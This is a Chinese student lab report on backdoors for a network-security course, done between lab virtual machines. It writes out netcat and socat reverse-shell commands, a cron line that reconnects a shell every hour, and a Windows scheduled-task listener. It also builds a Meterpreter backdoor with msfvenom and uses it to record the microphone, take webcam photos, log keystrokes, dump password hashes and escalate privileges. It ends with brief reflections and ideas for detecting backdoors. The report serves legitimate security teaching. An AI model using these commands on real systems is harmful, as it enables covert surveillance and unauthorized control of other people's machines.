Exp2-後門原理與實踐
Exp2-後門原理與實踐
實驗內容 (4分+2分附加題) (1)使用netcat獲取主機操作Shell,cron啟動 (1分) (2)使用socat獲取主機操作Shell, 任務計劃啟動 (1分) (3)使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell(1分) (4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權 (1分) (5)可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell(2分)加分內容一併寫入本實驗報告。 (評分者注意,附加分寫在評論裡,不要和主分數混在一起)
一、常用後門工具
1.Netcat 、Socat系列
2.Meterpreter
3.Intersect
4.CHAOS……
本次實驗我們主要使用Netcat 、Socat系列以及Meterpreter。
二、實驗內容
(一)使用netcat獲取主機操作Shell,cron啟動
1.kali獲取windows虛擬機器的shell
(1)檢視kali虛擬機器的IP地址
ifconfig
(2)在kali虛擬機器中開啟監聽,埠號以學號為基礎指定
nc -l -p 11310
(3)windows反彈連線Linux,這裡首先在windows下進入ncat所在的資料夾,ip的地址為Linux的地址
ncat.exe -e cmd.exe 192.168.40.128 11310
(4)Linux下看到Windows的命令提示,驗證shell
2.Windows獲取kali虛擬機器的shell
(1)獲取Windows中的IP地址
ipconfig
(2)在ncat資料夾目錄下開啟監聽,埠選擇類學號數字
ncat.exe -l -p 11310
(3)Linux反彈連線win
nc 192.168.3.40 11310 -e /bin/sh
$$
/bin/sh是UNIX命令提供shell去執行shell命令
$$
(4)Windows獲得kali的shell,使用linux常用指令驗證
ls pwd whoami
3.cron啟動
Linux下進行
①Cron是Linux下的定時任務,每一分鐘執行一次,根據配置檔案執行預設的指令。
man cron
②crontab指令增加一條定時任務,"-e"表示編輯
crontab -e
③第一次編輯需要選擇,我們選擇2選項
④設定自啟動時間,每個小時的第12分鐘執行後面的指令
12 * * * * /bin/netcat 172.16.229.166 11310 -e /bin/sh
⑤在相應的時間節點開啟監聽,這裡我們選擇主機Windows
時間節點已經到,我們可以看見這裡window已經獲得了Linux的shell
(二)使用socat獲取主機操作Shell, 任務計劃啟動
1.Windows獲取kali虛擬機器的shell
(1)Kali開放11310埠
socat tcp-listen:11310 system:bash,pty,stderr
(2)Windows連線Kali虛擬機器,獲取終端,IP地址為Linux地址
socat - tcp:192.168.40.128:11310
注意:需要在socat檔案目錄中執行
(3)驗證終端功能,完全正常
ls pwd whoami
2.Kali獲取Windows虛擬機器的shell
(1)Windows開放11310埠
socat tcp-listen:11310 exec:cmd,pty,stderr
(2)Kali機連線Windows獲取終端
socat - tcp:192.168.3.40:11310
(3)驗證shell,成功
dir
3.Windows下任務計劃啟動
(1)建立基本任務,在計算機管理的任務計劃程式中進行操作
(2)進行觸發器、操作的相關設定
(3)編輯操作時,在引數中寫上以下資料
tcp-listen:11310 exec:cmd,pty,stderr
(4)等待達到相應設計的時間進行觀察
(5)在Kali中進行socat連線,測試shell
(三)使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
1.Kali端生成後門可執行檔案
Kali執行以下程式碼
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -f exe > 20191310_backdoor.exe
2.利用ncat將後門檔案傳送到Windows下獲取終端
(1)在Windows的cmd下監聽11310埠,獲取後門檔案
ncat.exe -l 11310 > 20191310_backdoor.exe
(2)虛擬機器傳送後門檔案
nc 192.168.3.40 11310 < 20191310_backdoor.exe
(3)檢視傳送結果
傳送成功:
(4)MSF
①啟動msf
msfconsole
②進行相關設定
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
③設定LHOST、LPORT
set LHOST 192.168.40.128
set LPORT 11310
(5)進行觸發
exploit
(5)Windows下進行操作,打開後門可執行檔案(可以用管理員身份執行)
(6)獲取shell終端,使用dir驗證,顯示成功
(四)使用MSF meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
1.獲取目標主機音訊
輸入以下指令
record_mic
2.獲取目標攝像頭內容
輸入以下指令
webcam_snap
3.獲取擊鍵記錄
keyscan_start//開始記錄
keyscan_dump//讀取
4.獲取截圖資訊
screenshot
5.嘗試提權
getsystem
根據此處部落格設定方法,最終提權成功,在此不再贅述(https://blog.csdn.net/redwand/article/details/107527710)
6.許多有趣的攻擊指令
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
hashdump Dumps the contents of the SAM database
timestomp Manipulate file MACE attributes
shell getshell
(五)可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell
1.後門exe檔案方法
①生成exe可執行檔案
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -x pwn1 -f elf > pwn_exp2
②執行生成的檔案,注意必須先給生成的檔案以許可權
chmod +x pwn_exp2 *給許可權*
./pwn_exp2 | nc 192.168.3.40 11310 -e /bin/sh *執行檔案*
③Windows下監聽,獲取shell並使用以下指令驗證shell
ls whoami pwd
三、實驗總結與體會
通過本次實驗,我學會了在理想情況下,也就是實驗情況下對linux和windows植入後門的操作,這算是我第一次對於後門的實踐,這裡麵包括開啟偵聽、反彈連線、生成和傳送後門程式、利用後門或者傳送的程式控制被控主機、修改定時任務列表、使用ncat的加強工具socat獲取主機操作Shell等。
實驗過程中,已經完完全全體會到了攻擊者的“樂趣”和攻擊成功後的成就感,當看到我的電腦攝像頭自己閃光的時候,我想到了斯諾登揭露的那些事,原來這種技術我們就可以實現最簡單的實踐,這是何其真實和危險!
網路安全有關國家安全,這次是真真切切讓我感受到了,網路的世界有多少深不可測的高手,網路的空間有多少實實在在的攻擊和巧妙的攻擊手段,資訊保安、網路安全絕對不容忽視!
網路安全異常重要,網路對抗的實驗真真切切讓我學到了很多!我知道了後門的原理並且進行了簡單的實踐!
四、基礎問題回答
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
我能想到的是我們下載軟體的時候,採用的是一些方法連結,或者非官方渠道進行下載的話,這些我們下載的程式很有可能便被掛馬或者留下後門了,而且一定是經過精心設計的,這樣當我們使用這些程式軟體的時候,後門就進入到我們的系統了
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
後門修改了系統設定,將定時啟動管理器添加了定時的啟動引數
linux中crontab檔案被修改,週期性反向連線控制主機**
(3)Meterpreter有哪些給你映像深刻的功能?
生成的後門程式若在“理想情況”下可以偷偷錄影,偷偷拍照,偷偷幹好多事,非常有趣,但現在就是學習如何在現實狀況下突破防毒軟體、防火牆等等障礙實現後門
(4)如何發現自己有系統有沒有被安裝後門?
1.看防毒軟體的反饋,如360,火絨等
2.觀察系統的自啟動項
- 觀察工作管理員內的程序,看是否有異常程序和可疑程序
- 觀察任務計劃程式